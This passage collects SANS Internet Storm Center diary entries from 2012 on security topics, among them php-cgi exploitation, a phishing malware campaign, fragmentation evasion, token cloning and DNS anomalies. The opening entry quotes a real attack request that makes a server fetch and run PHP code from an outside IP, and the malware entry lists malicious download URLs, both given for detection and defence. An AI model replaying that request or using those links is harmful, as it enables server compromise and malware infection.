- allow_url_include=on: This directive allows additional PHP code located at an http or ftp URL to be included into the PHP file before it is processed and executed.

- auto_prepend_file=http://81.17.24.82/info3.txt: This directive includes the PHP code located at http://81.17.24.82/info3.txt and executes it before the code inside index.php.
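If you want to look for similar attempts in your own logs, the following Python sketch decodes the request from Bob's log entry and lists the injected directives. It assumes Apache style access log lines with the request in quotes, and relies on the trait that makes this exploit work: the query string contains no unencoded "=" and starts with "-", so php-cgi treats it as command line switches. The function name `php_cgi_directives` is made up for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Assumption: the request is logged as "METHOD /path?query HTTP/x.y".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')

LOG_LINE = (
    'bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] '
    '"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL'
    '+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn'
    '+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" '
    '404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"'
)


def php_cgi_directives(log_line: str) -> dict:
    """Return the '-d name=value' switches smuggled in via the query string."""
    match = REQUEST.search(log_line)
    if not match:
        return {}
    query = urlsplit(match.group(1)).query
    # A normal query string (a=b&c=d) contains a literal "=" and is harmless here.
    if "=" in query or not query.startswith("-"):
        return {}
    directives = {}
    for argument in unquote_plus(query).split():
        if argument.startswith("-d"):
            name, _, value = argument[2:].partition("=")
            directives[name] = value
    return directives


for name, value in php_cgi_directives(LOG_LINE).items():
    print(f"{name} = {value}")
```

Running this over a whole access log and printing any non-empty result gives a quick list of hosts probing for the vulnerability, along with the URLs they try to pull code from.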

You can prevent this by using the latest stable PHP version located at the downloads page. If you are using Windows, please be careful, because you may also be affected by CVE-2012-2376. For more information regarding remediation of this vulnerability, please check my previous diary about it.

Have you seen such entries in your web server's access.log file? We want to hear about it. Let us know!

Manuel Humberto Santander Peláez

SANS Internet Storm Center - Handler

Twitter:@manuelsantander

Web:http://manuel.santander.name

e-mail:msantand at isc dot sans dot org




New e-mail scam targeting Colombian Internet users: This time claiming to be from the Transport authority

Scams keep coming! This time, many users from all across the country were targeted by an e-mail scam claiming to be a traffic ticket notice from the Transport Authority.



Two links were provided in the e-mail: http://www.mcc-instrumentation.com/videos/Ver_Documento_ID_23452345212234_VER_Cod_2345234723497.html and http://www.la-cloture-electrique.fr/upload/Ver_Documento_ID_23472893475987980798072344_VER_Cod_2234523345234723497.html. Both of them redirect to the file Aviso-Multas_DOC.exe, with MD5 d554f70ce28470350269d8e6778127e3. Once executed, it downloads the following files:

| File | MD5 |
|---|---|
| atu.exe | 1466d43e8ae62af74a83eb81094c7c25 |
| ky.exe | 974f4ceaca680fe4572a0e050fc851db |
| wrm.exe | e63c7844a75df064d78f1894e6f673bb |
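If you want to check a suspect machine or a mail quarantine folder for these files, the hashes above can be used directly. Here is a minimal Python sketch. The hash list is taken from this diary; the helper names are my own. Keep in mind that MD5 matching only finds byte-identical copies, so a repacked variant will not be detected.

```python
import hashlib

# MD5 hashes listed in this diary, mapped to the file names observed.
KNOWN_BAD_MD5 = {
    "d554f70ce28470350269d8e6778127e3": "Aviso-Multas_DOC.exe",
    "1466d43e8ae62af74a83eb81094c7c25": "atu.exe",
    "974f4ceaca680fe4572a0e050fc851db": "ky.exe",
    "e63c7844a75df064d78f1894e6f673bb": "wrm.exe",
}


def md5_of_file(path: str, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so large files do not need to fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def known_sample_name(path: str):
    """Return the sample name if the file matches a listed hash, else None."""
    return KNOWN_BAD_MD5.get(md5_of_file(path))
```

A typical use would be to walk a directory with `os.walk` and call `known_sample_name` on every `.exe` found, reporting any path for which it returns a name.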

The exe files read all the TCP/IP registry parameters. After that, they connect to some servers to report to some kind of botnet:

One of the reports seems to be sent by mail, because the php script where the program reports gets a warning:

As of today, other servers have removed the offending PHP scripts and send a 404 error to the program. No further action is taken by the program, and it becomes resident by creating entries under HKLM\Software\Microsoft\Windows\Currentversion\Run.

Have you seen these kinds of packets in your network? Let us know!

Manuel Humberto Santander Peláez

SANS Internet Storm Center - Handler

Twitter:@manuelsantander

Web:http://manuel.santander.name

e-mail:msantand at isc dot sans dot org


Technical Analysis of Flash Player CVE-2012-0779

Microsoft Malware Protection Center (MMPC) posted a technical analysis of malware targeting an Adobe Flash Player vulnerability (CVE-2012-0779) for which Adobe released a critical patch update earlier this month (diary posted here [1]). The technical analysis shows how the infection occurs when a malicious document is opened. The technical analysis is posted here [2]. Get the latest version of Flash Player here [3] (Flash Player 11.2.202.233 and earlier is vulnerable).

[1] http://isc.sans.edu/diary/Adobe+Security+Flash+Update/13129

[2] http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx

[3] http://get.adobe.com/flashplayer/

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Google Publishes Transparency Report

Google just released its transparency report disclosing data dating from July 2011. As an example, the report shows the number of requests it received over the past month: the number of URL removal requests (1,255,402), targeted domains (24,374), copyright owners (1,314) and reporting organizations (1,099). The full report is available here [1]. A blog post by Fred von Lohmann, Google's Senior Copyright Counsel, is available here [2].

[1] http://www.google.com/transparencyreport/removals/copyright/

[2] http://googleblog.blogspot.ca/2012/05/transparency-for-copyright-removals-in.html

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


ISC Feature of the Week: Country Report

Overview

As promised in the Data/Reports Feature Diary, this week we will cover the Country Report page at https://isc.sans.edu/countryreport.html in detail. The Worldmap graphic on this page is used in numerous spots around the site and links back here in most cases.

Features

Worldmap - https://isc.sans.edu/countryreport.html#worldmap

- Summary graph color coded with legend by port

- Grouped and graphed by percentage (%)

Country Statistics - https://isc.sans.edu/countryreport.html#statistics

- Link to Country Report page which individually lists countries, as well as other features worthy of its own feature.

- To view specific country summary data, select a Country name from the drop-down and click Submit.

- Summary table of country name, country flag, additional information and data submitted through our sensor

How to read this table / FAQs - https://isc.sans.edu/countryreport.html#faq

- Detailed explanation of the Statistics table above and where certain information is pulled from.

Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

--

Adam Swanger, Web Developer (GWEB, GWAPT)

Internet Storm Center https://isc.sans.edu


Problems with MS12-035 affecting XP, SBS and Windows 2003?

There is a fair amount of chatter in Microsoft forums regarding problems caused by recent Microsoft patches. [1][2][3][4] From what I can gather, users are repeatedly being prompted to reinstall 3 older .NET patches on some OS distributions. It looks like MS12-035 was intended to replace 3 older patches (MS11-044, MS11-078 and MS12-016) and something isn't quite right. You may want to hold off deploying that patch until we know more.

Thanks to Dave (ToyMaster) for the heads up and hard work researching the issue. I think he has a blog post pending [5] that will explain the issue in more detail. I'll keep you updated here as I learn more.

Do you have any more information for us? Leave me a comment or contact us via the handler contact page.

Mark Baggett

[5] http://home.comcast.net/~itdave/site/




IP Fragmentation Attacks

Using overlapping IP fragmentation to avoid detection by an IDS has been around for a long time. We know how to solve this problem. The best option in my opinion is to use a tool such as OpenBSD's pf packet filter [1] to scrub our packets, eliminating all the fragments (pfSense [2] makes this easy to deploy). However, this option is not without its caveats [3]. You could simply configure your IDS to alert on and/or drop any overlapping fragmented packets. Overlapping fragments should not exist in normal traffic. Another option is to configure the IDS to reassemble the packets the same way the endpoint reassembles them. Snort's frag3 preprocessor will reassemble the packets based on the OS of the target IP and successfully detect any fragmented attacks that would work against a given target host. Problem solved, right? Not quite. There is another opportunity for attackers to use differences in the fragmentation reassembly engines to their advantage. What happens when the IDS analyst turns to their full packet capture to understand the attack? If the analyst's tools reassemble the packets differently than the target OS, the analyst may incorrectly dismiss the TRUE positive as a FALSE positive.
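To make the reassembly difference concrete, here is a minimal sketch in Python. It only models two of the policies ("First" and "Last"), works on plain byte offsets rather than the 8-byte units real IP fragments use, and ignores gaps. The function name and the sample payload are made up for illustration; this is not how frag3 or reassembler.py are implemented.

```python
def reassemble(fragments, policy="first"):
    """Reassemble (offset, data) fragments given in arrival order.

    policy="first": bytes that arrived first win over later overlaps.
    policy="last":  later fragments overwrite bytes received earlier.
    """
    if policy not in ("first", "last"):
        raise ValueError("only the 'first' and 'last' policies are sketched here")
    buffer = {}
    for offset, data in fragments:
        for i, byte in enumerate(data):
            position = offset + i
            # Under "last" every byte is overwritten; under "first" only
            # positions that are still empty get filled.
            if policy == "last" or position not in buffer:
                buffer[position] = byte
    return bytes(buffer[position] for position in sorted(buffer))


# Hypothetical payload: the second fragment overlaps the tail of the first.
fragments = [(0, b"GET /index"), (5, b"admin.php")]
first_view = reassemble(fragments, "first")
last_view = reassemble(fragments, "last")
print(first_view, last_view)
```

The same two fragments produce two different requests depending on the policy, which is exactly the gap between what a sensor and a target host may see.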

Today, with the low cost of disk drives, more and more organizations can afford to maintain full packet captures of everything that goes in and out of their network. If you are not running full packet capture, you really should look into it. I don't think there is a better way to understand attacks on your network than having full packet captures. One great option is to install Daemonlogger [4] on the Linux/BSD distribution of your choice. This was an option I used for many years. Today, I use the Security Onion distro [5] by Doug Burks. If you want a free IDS with full packet capture that you can quickly and easily deploy, Security Onion is a great option.



Once you have the full packet capture, how do you find the fragmented attacks? You could try reassembling them with Wireshark. Let's check that out and see what happens. Security Onion has scapy installed so let's use that to generate some overlapping fragments. I'll generate the classic overlapped fragment pattern illustrated by the paper “Active Mapping: Resisting NIDS Evasion Without Altering Traffic” by Umesh Shankar and Vern Paxson [6] and then further explained in “Target Based Fragmentation Assembly” by Judy Novak [7].


Now open up our "fragmentpattern.pcap" with Wireshark and see what we see.

If you compare the reassembled pattern to what was outlined in Judy Novak's paper, you will recognize the BSD reassembly pattern. So you will see all the attack packets that are targeted at a host using the BSD reassembly methodology, but not ones targeted at the other reassembly policies (First, Last, BSD-Right and Linux). For example, you would not see overlapping fragmentation attacks targeted at Windows or Linux hosts. However, Security Onion now (as of build 20120518 [8]) has a Python script called "reassembler.py". If you provide reassembler.py with a pcap that contains fragments, it will reassemble the packets using each of the 5 reassembly engines and show you the result. It will even write the 5 versions of the packets to disk so you can examine binary payloads as the target OS would see them. Let's see what reassembler does with the fragmented packets we just created.


Now you can see exactly what the IDS saw and make the correct decision when analyzing your packet captures. If using the Onion isn't an option for you, you can download reassembler.py direct from my SVN http://baggett-scripts.googlecode.com/svn/trunk/reassembler/. How do you handle this? What are some other ways to solve this problem? Leave a comment.

Security Onion creator Doug Burks and I are teaching together in Augusta GA June 11th - 16th. Come take "SEC503 Intrusion Detection In-Depth" from Doug or "SEC560 Network Penetration Testing and Ethical Hacking" from me BOOTCAMP style! Sign up today! [9]

Mark Baggett

[1] http://www.freebsd.org/doc/handbook/firewalls-pf.html

[2] http://www.pfsense.org/

[3] http://sysadminadventures.wordpress.com/2010/11/02/why-pfsense-is-not-production-ready/

[4] http://www.snort.org/snort-downloads/additional-downloads

[5] http://securityonion.blogspot.com/

[6] http://www.icir.org/vern/papers/activemap-oak03.pdf

[7] http://www.snort.org/assets/165/target_based_frag.pdf

[8] http://securityonion.blogspot.com/2012/05/security-onion-20120518-now-available.html

[9] http://www.sans.org/community/event/sec560-augusta-jun-2012


When factors collapse and two factor authentication becomes one.

The benefits of two factor authentication are pretty much Security 101 material. And we are also told that two factors are more than "password 1" and "password 2". RSA for example, one of the leaders of two factor authentication, defines this pretty nicely:

"Two-factor authentication is also called strong authentication. It is defined as two out of the following three proofs:

- Something known, like a password,

- Something possessed, like your ATM card, or

- Something unique about your appearance or person, like a fingerprint."

There are a number of ways these factors can collapse. For example, for a one-time password token, the user typically needs to remember a password, or a PIN, as a second factor. Users tend to write this password on the back of the token, collapsing the factors. Now you only need to "possess" the token. In a more elaborate case, I ran into a user who had a webcam at home pointed at the token (he always forgot his token at home). Now all you needed to access the system was "something known" (the URL of the webcam and the password).

Tokens themselves pose a different threat of collapsing factors. Tokens operate by calculating a hash of an internal secret ("seed") and either a timestamp or a counter. You may not know the seed, but someone else may. This issue has come up with the recent breach of RSA that may have led to the leak of these seeds. The "seed" should not be directly related to the serial number printed on the device, but in the RSA case, it was alleged that the stolen data included some form of lookup table like that. RSA's algorithm to calculate the token value had already been leaked years earlier. Of course, for software tokens in particular, the algorithm can be reverse engineered. Evidently, someone has now managed to do just that, and to retrieve the seed value from the software token [3]. Physical tokens are usually hardened to prevent someone from stealing the seed value, in particular from doing so undetected. In many ways, a "token" is a secret that you don't know.

What should you do about all this?

- Know the limitations of two factor authentication and educate your users. Tokens aren't the end of password attacks, but they make them substantially harder.

- Stolen or lost tokens need to be deactivated immediately. This includes soft tokens. Soft tokens need to be invalidated even if the device is later recovered.

- If you are auditing an organization, watch for "collapsed factors"

- Some two factor authentication systems, for example the standards-based time-based (TOTP) and HMAC-based (HOTP) one-time password systems [4][5], usually expose the seed during setup. It is also typically rather easy to "clone" tokens in these settings (e.g. Google Authenticator uses TOTP). You may want to set up the token for users, or at least ensure that the seed is transmitted and entered securely.
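To show why knowing the seed is all it takes to clone a token of this kind, here is a minimal sketch of the HOTP and TOTP calculations from RFC 4226 and RFC 6238 using only the Python standard library. It covers the public standards only, not RSA's proprietary algorithm; the function names and defaults (6 digits, 30 second step, SHA-1) are choices made for this example.

```python
import hashlib
import hmac
import struct
import time


def hotp(seed: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) for a given counter value."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation: low nibble picks the offset
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(seed: bytes, now=None, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password (RFC 6238): HOTP over the time step count."""
    if now is None:
        now = time.time()
    return hotp(seed, int(now) // step, digits)


# Seed taken from the test vectors published in the RFCs.
rfc_seed = b"12345678901234567890"
print(hotp(rfc_seed, 0), totp(rfc_seed, now=59, digits=8))
```

Nothing in the calculation depends on the device itself. Anyone who obtains the seed, whether from a setup QR code, a backup, or a vendor database, can produce the same codes.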

[1] http://www.rsa.com/glossary/default.asp?id=1056

[2] http://www.theregister.co.uk/2011/03/18/rsa_breach_leaks_securid_data/

[3] http://arstechnica.com/security/2012/05/rsa-securid-software-token-cloning-attack/

[4] http://tools.ietf.org/html/rfc6238

[5] http://tools.ietf.org/html/rfc4226

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


The "Do Not Track" header

A recent proposal, supported by many current web browsers, suggests the addition of a "Do Not Track" (DNT) header to HTTP requests [1]. If a browser sends this header with a value of "1", it indicates that the user would not like to be "tracked" by third party advertisers. The server may include a DNT header of its own in responses to indicate that it does comply with the do-not-track proposal.
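On the receiving side, reading the header is simple. The sketch below assumes the request headers are already available as a plain dictionary; the function name is hypothetical and not part of any framework or of the proposal itself.

```python
def dnt_opt_out(headers):
    """Return True if the request headers carry a DNT header with value 1."""
    for name, value in headers.items():
        # HTTP header names are case-insensitive.
        if name.lower() == "dnt":
            return value.strip() == "1"
    return False


print(dnt_opt_out({"User-Agent": "example", "DNT": "1"}))
```

What a site does once this returns True is entirely up to the site.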

The proposal focuses on third party advertisements. It does suggest retention periods for first parties (2 weeks for all logs, up to 6 months for security relevant logs) to retain some compatibility with compliance standards that require specific logging schemes and retention times.

The biggest problem with this standard, aside from user awareness, is the fact that this is all voluntary. There is no technical means to enforce that a web site treats your data in accordance with the DNT header. Some legal protections are in the works, but as usual, they will probably only apply to legitimate advertisers who are likely going to comply. DNT will only matter if enough advertisers sign up to respect it. It is kind of like the "robots.txt" file, and could even be abused for user tracking as it will make browsers even more "unique" to allow them to be identified without the use of cookies or other tracking mechanisms. [3]

If you are concerned about tracking by third party sites, you need to not load content from third party sites, in particular ads and additional trackers (like cookies). Various ad blockers will help with this. Of course at the same time, you are violating the implicit contract that keeps many sites afloat: For letting you watch my content for free, my advertisers will track you.

At the same time, users overwhelmingly don't appear to care much about privacy. The "Do Not Track" header is usually not enabled by default. I don't think many users know about it, or how to enable it. The URL listed below has instructions on how to enable it, and will tell you if it is enabled in your browser. On the ISC website, the number of users with DNT enabled went from about 3.4% to 5.1%, which shows that while DNT adoption in our more technical readership is picking up, it is still rather low.

As far as this website is concerned: We do continuously try to refine our site to "leak less" of our visitors' information. For example, we recently switched to a privacy enhanced social sharing toolbar. Our site is also using https for most parts. Aside from the obvious encryption advantage, this will prevent referrer headers from being included if you are clicking on a non-https link on our site.

Our biggest issue right now is the use of Google Analytics, and Google Ads in a couple of spots, but I am reviewing these, and am looking for a replacement for Google Analytics. Over time, I hope to have less and less third party content on the site that could be used to track visitors, whether or not they have the "Do Not Track" feature enabled.

[1] http://donottrack.us/

[2] http://tools.ietf.org/id/draft-mayer-do-not-track-00.txt

[3] https://panopticlick.eff.org/

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


nmap 6 released

nmap 6 was released earlier today, which is a major upgrade to the old version of nmap. One feature that excites me in particular is "full IPv6 support", including OS fingerprinting.

In order to efficiently scan IPv6 networks, nmap added multicast requests to enumerate live hosts on a network.

For more details, see http://nmap.org/6

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


DNS ANY Request Cannon - Need More Packets

- Source IP is spoofed

- Flood lasts up to 60 seconds with 500 queries (as witnessed, but likely could be more)

- Flood comes from a designated IP and seems to target multiple domains on the authoritative server

- All observed requests are similar thus far

- This appears to be similar to what others have seen [1]

Example DNS Log Entry:

- x.x.x.x is the spoofed/target server

- example.com/10.1.1.1 is the "reflecting" DNS server


PHP 5.4 Exploit PoC in the wild

Clarifications/Updates to the original diary:

- This is NOT remotely exploitable. An exploit would require the attacker to upload PHP code to the server, at which point the attacker could just use PHP to run shell commands via "exec".

- Only the Windows version is vulnerable.

- On Windows, the "COM" functions are part of PHP core, not an extension.

- this is not at all related to the (more serious) CVE-2012-2336 vulnerability mentioned below. The com_type_info vulnerability is now known as CVE-2012-2376.

/jbu/

--- original report by Manuel ----

There is a remote exploit in the wild for PHP 5.4.3 on Windows, which takes advantage of a vulnerability in the com_print_typeinfo function. The PHP engine needs to execute the malicious code, which can include any shellcode, like the ones that bind a shell to a port.

Since there is no patch available for this vulnerability yet, you might want to do the following:

- Block any file upload function in your php applications to avoid risks of exploit code execution.

- Use your IPS to filter known shellcodes like the ones included in metasploit.

- Keep PHP at the currently available version, so that you are not a possible target for other vulnerabilities like CVE-2012-2336, registered at the beginning of the month.

- Use your HIPS to block any possible buffer overflow in your system.

Manuel Humberto Santander Peláez

SANS Internet Storm Center - Handler

Twitter:@manuelsantander

Web:http://manuel.santander.name

e-mail: msantand at isc dot sans dot org


ZTE Score M Android Phone backdoor

The ZTE Score M phone, apparently available via Metro PCS in the US, comes with a special suid backdoor. For a change, the backdoor does not use a fixed "secret" root password. Instead, the suid binary "sync_agent" has to be called with a special parameter.

If you do have an Android phone, check whether you have this application in "/system/bin". At this point, only this one particular model is reported to have this application present, but it would be odd if ZTE did not use the same backdoor on other models.

Cataloging and limiting suid applications should be a standard unix hardening step. The simplest way in my opinion to find suid binaries is to use this find command:

find / -xdev -type f -perm -u=s

Files with the suid bit set will run as the user owning the file, not as the user executing the file. This is typically used to allow normal users to execute particular administrative tasks. So verify whether normal users actually need to execute a particular binary before removing the suid bit.
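If you would rather catalog suid files from a script, for example to diff the list against a known-good inventory, the same check can be sketched in Python. The function name is made up for this example, and unlike the find command above it does not stay on one filesystem, so point it at the directory you care about.

```python
import os
import stat


def find_suid(root):
    """Yield regular files under root that have the set-user-ID bit set."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                info = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished file
            if stat.S_ISREG(info.st_mode) and info.st_mode & stat.S_ISUID:
                yield path
```

For the ZTE case, `sorted(find_suid("/system/bin"))` would be the list to review.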

Update: The file has also been found on the ZTE Skate.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


ISC Feature of the Week: Tools->Information Gathering

Overview

One of the sections on the ISC Tools page is Information Gathering at https://isc.sans.edu/tools/#info-gathering. This collection will help you easily find out how your browser and plugins look to the outside and lists some other information lookup tools.

Features

Browser Headers - https://isc.sans.edu/tools/browserinfo.html

How a server sees your browser.

- https://isc.sans.edu/tools/browserinfo.html#your-info - Your public IP and various pieces of header information

- https://isc.sans.edu/tools/browserinfo.html#additional - Additional lookups that require javascript be enabled

- https://isc.sans.edu/tools/browserinfo.html#plain-text - Plain text information summary you can copy/paste for analysis

Browser Plugin Detector - https://isc.sans.edu/tools/adobinator.html

This page attempts to detect various browser plugins. The detection code used was created using PluginDetect.

- Lists plugins detected and various version information for each.

Site Availability Check - https://isc.sans.edu/tools/sitecheck.html

Checks if hostname is reachable.

- Single input box.

- Displays failure if unreachable.

- If reachable, outputs:

  - Page load time

  - Page size in bytes

  - Return status code (e.g. 200 success)

  - Final URL

Site DNS Check - https://isc.sans.edu/tools/dnscheck.html

Hostname to IP DNS resolver.

- Single input box.

- Output IP if system is able to resolve.

Whereis[IP] - https://isc.sans.edu/tools/whereis.html

- Multi-line input box. Enter one(1) IP per line.

- Output table contains:

  - IP ADDRESS queried

  - ASN of IP

  - NETWORK assignment

  - COUNTRY abbreviation

  - ISP name

  - RIR - Name of registry

Content Security Policy Test - https://isc.sans.edu/tools/csptest.html

Created for Firefox 4 but features may be found in other browsers.

- Lots of details and information on the test outlined and explained on the page

Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

--

Adam Swanger, Web Developer (GWEB, GWAPT)

Internet Storm Center https://isc.sans.edu


Do Firewalls make sense?

Once in a while, someone comes up with the idea that firewalls are really not all that necessary. Most recently, Roger Grimes of Infoworld [1][2]. I am usually of the opinion that we definitely probably need firewalls. But I think the points made by the anti-firewall faction offer some insight into not only why we really need firewalls, but also what people don't understand about firewalls.

To clarify from the start: I am talking here about good old basic network firewalls. No deep packet inspection rules and no host based firewalls.

From a security point of view, firewalls offer two main functions: They regulate traffic, and they provide logs. The second part is often neglected. But look over some of the stories here, and quite frequently, you will find cases in which firewall logs tripped the scale. For example the "duplicate DNS response" issue earlier this week was initially found by an observant reader watching firewall logs.

When it comes to filtering, some consider firewalls not worth the trouble because "they only filter on ports that are closed on the server anyway". I think this shows a lack of understanding of what a firewall can do to protect servers. My best firewall wins usually came from outbound filtering of traffic trying to leave the server.

The next argument against firewalls is that there are usually better devices to do the filtering: Proxies have real application insight, router and switch ACLs can usually pick up the low end port filtering part. As far as the proxy is concerned: I say get one too. But proxies are usually rather complex devices to configure correctly and I would rather get the easy stuff out of the way first using a firewall. At the same time: How do I make sure my traffic actually uses the proxy? That typically involves a firewall.

A switch or a router may have many features that are found in a classic firewall (even stateful rules and some application logic). They may be perfectly fine for a home user or a small business. However, in particular in an enterprise context, you probably want to split the firewall functionality to a different device, and with that to a different group of people. The people dealing with routing and network performance ("packet movers") are usually not the same people that are dealing with firewalls and filtering ("packet droppers").

But how many "modern" attacks are really blocked by firewalls? Aren't they all sending a spear phishing email to the user, tricking the user into downloading malware some Chinese kid wrote via the filtering proxy we installed? Next they exfiltrate the data via that same proxy (or DNS, or SMTP... or other services we have to allow). In part, these modern attacks are a testament to the effectiveness of firewalls. An attacker would probably rather still use the same tool they used back in the 90s to brute force file sharing passwords and download data straight from the system. But sadly, because now even some universities block file sharing using a firewall, these attacks no longer work.

Against these modern attacks, we have other defenses. Some may work against the older versions of these attacks as well. In short, these defenses can be summarized as "end point protection" (whitelisting, anti-virus, host based firewall, hardening of the system...). Hardening a large number of end points is however a lot more difficult than configuring a few firewalls well placed at the right choke points.

By now, you are probably going to ask yourself: Why hasn't he talked about "defense in depth" yet? The argument doesn't really apply if you are trying to argue for removing a device. Each additional security device can be justified with "defense in depth". But some security devices do not add enough value to justify the expense. I don't think "defense in depth" itself can be used to justify a *particular* security device. It rather justifies the fact that some of our security devices are redundant and fulfill similar, but not identical, roles.

To summarize: If the last time you looked at your firewall rules and logs was back in 2003 to stop SQL slammer, you probably may as well get rid of it. But a well managed and configured firewall can have significant value. It is one of the simpler security devices you probably have. Consider it the good reliable 6 shooter as compared to the fancy (but sometimes flakey) F-22. Which one are you going to take along to get money from the ATM that just appeared in the DEFCON hotel lobby ;-) .

Thoughts? Flames? Use the comment feature or send us a non-public comment via the contact form.

[1] http://www.infoworld.com/d/security/the-firestorm-over-firewalls-193409

[2] http://www.networkworld.com/news/2005/070405perimeter.html

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


Reserved IP Address Space Reminder

As we are running out of IPv4 address space, many networks, instead of embracing IPv6, stretch existing IPv4 space via multiple levels of NAT. NAT then uses "reserved" IP address space. However, there are more address ranges reserved than those listed in RFC1918, and not all of them should be used in internal networks. Here is a (probably incomplete) list of address ranges that are reserved, and which ones are usable inside your network behind a NAT gateway.

| Address Range | RFC | Suitable for Internal Network |
|---|---|---|
| 0.0.0.0/8 | RFC1122 | no ("any" address) |
| 10.0.0.0/8 | RFC1918 | yes |
| 100.64.0.0/10 | RFC6598 | yes (with caution: If you are a "carrier") |
| 127.0.0.0/8 | RFC1122 | no (localhost) |
| 169.254.0.0/16 | RFC3927 | yes (with caution: zero configuration) |
| 172.16.0.0/12 | RFC1918 | yes |
| 192.0.0.0/24 | RFC5736 | no (not used now, may be used later) |
| 192.0.2.0/24 | RFC5737 | yes (with caution: for use in examples) |
| 192.88.99.0/24 | RFC3068 | no (6-to-4 anycast) |
| 192.168.0.0/16 | RFC1918 | yes |
| 198.18.0.0/15 | RFC2544 | yes (with caution: for use in benchmark tests) |
| 198.51.100.0/24 | RFC5737 | yes (with caution: test-net used in examples) |
| 203.0.113.0/24 | RFC5737 | yes (with caution: test-net used in examples) |
| 224.0.0.0/4 | RFC3171 | no (Multicast) |
| 240.0.0.0/4 | RFC1700 | no (or "unwise"? reserved for future use) |

Most interesting in this context is RFC6598 (100.64.0.0/10), which was recently assigned to provide ISPs with a range for NAT that is not going to conflict with their customers' NAT networks. It has become a more and more common problem that NAT'ed networks, once connected with each other (for example via a VPN tunnel), have conflicting assignments.
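If you want to check addresses from a config file or log against the table above, a lookup can be sketched with Python's standard `ipaddress` module. The verdicts are copied from the table and shortened to "yes", "caution" and "no"; the function name is made up for this example, and the list is as incomplete as the table.

```python
import ipaddress

# Ranges and verdicts copied from the table above.
RESERVED = [
    ("0.0.0.0/8", "no"),
    ("10.0.0.0/8", "yes"),
    ("100.64.0.0/10", "caution"),
    ("127.0.0.0/8", "no"),
    ("169.254.0.0/16", "caution"),
    ("172.16.0.0/12", "yes"),
    ("192.0.0.0/24", "no"),
    ("192.0.2.0/24", "caution"),
    ("192.88.99.0/24", "no"),
    ("192.168.0.0/16", "yes"),
    ("198.18.0.0/15", "caution"),
    ("198.51.100.0/24", "caution"),
    ("203.0.113.0/24", "caution"),
    ("224.0.0.0/4", "no"),
    ("240.0.0.0/4", "no"),
]


def internal_use(address):
    """Return (range, verdict) for a reserved address, or None if not listed."""
    ip = ipaddress.ip_address(address)
    for cidr, verdict in RESERVED:
        if ip in ipaddress.ip_network(cidr):
            return cidr, verdict
    return None


print(internal_use("100.64.3.4"))
```

A result of None means the address is not in any listed reserved range, so it is most likely ordinary routable space and should not be used internally behind NAT.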

Which networks did I forget? I will update the table for a couple days as comments come in.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


Got Packets? Odd duplicate DNS replies from 10.x IP Addresses

This is a clarification to Dan's diary from yesterday. We are interested to hear if anybody else is seeing DNS replies from RFC1918 non-routable IP addresses, in particular from 10.0.0.0/8. So far, we only have one report, and we are trying to figure out if this is something widespread, or something unique to this user.

This reader first noticed the problem when the firewall reported more dropped packets from 10.x addresses. Two example queries that caused the problem are A queries for 25280.ftp.download.akadns.net and adfarm.mplx.akadns.net. The reader receives two responses: One "normal" response from the IP address the query was sent to, and a second response from the 10.x address. As a result, the problem would go unnoticed even if the 10.x response is dropped. Both responses provide the same answer, so this may not be an attack, but more of a misconfiguration.

As a side note, initially the DNS protocol specifically allowed for replies to arrive from an IP address different than the one the query was sent to:

"Some name servers send their responses from different addresses than the one used to receive the query. That is, a resolver cannot rely that a response will come from the same address which it sent the corresponding query to. This name server bug is typically encountered in UNIX systems." (RFC1035)

However, later in RFC2181, this requirement was removed:

"Most, if not all, DNS clients, expect the address from which a reply is received to be the same address as that to which the query eliciting the reply was sent. This is true for servers acting as clients for the purposes of recursive query resolution, as well as simple resolver clients. The address, along with the identifier (ID) in the reply is used for disambiguating replies, and filtering spurious responses. This may, or may not, have been intended when the DNS was designed, but is now a fact of life." (RFC2181)

But we are NOT looking for responses that are coming from the wrong source, but for duplicate responses: one from the correct address and one from the incorrect address.

Here is an example "stray" packet submitted by the reader (slightly modified for privacy reasons and to better fit the screen):
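If you have DNS replies in a form you can script against, the pattern we are after can be sketched like this. The input format (one tuple per reply, already matched to the server the query was sent to) and the function name are assumptions made for this example, and the addresses below are placeholders, not data from the report.

```python
from collections import defaultdict


def find_duplicate_replies(replies):
    """Find queries answered by the queried server AND by some other source.

    replies: iterable of (queried_server, transaction_id, qname, reply_source).
    Returns {(queried_server, transaction_id, qname): [stray sources]}.
    """
    sources_by_query = defaultdict(set)
    for queried_server, txid, qname, reply_source in replies:
        sources_by_query[(queried_server, txid, qname)].add(reply_source)

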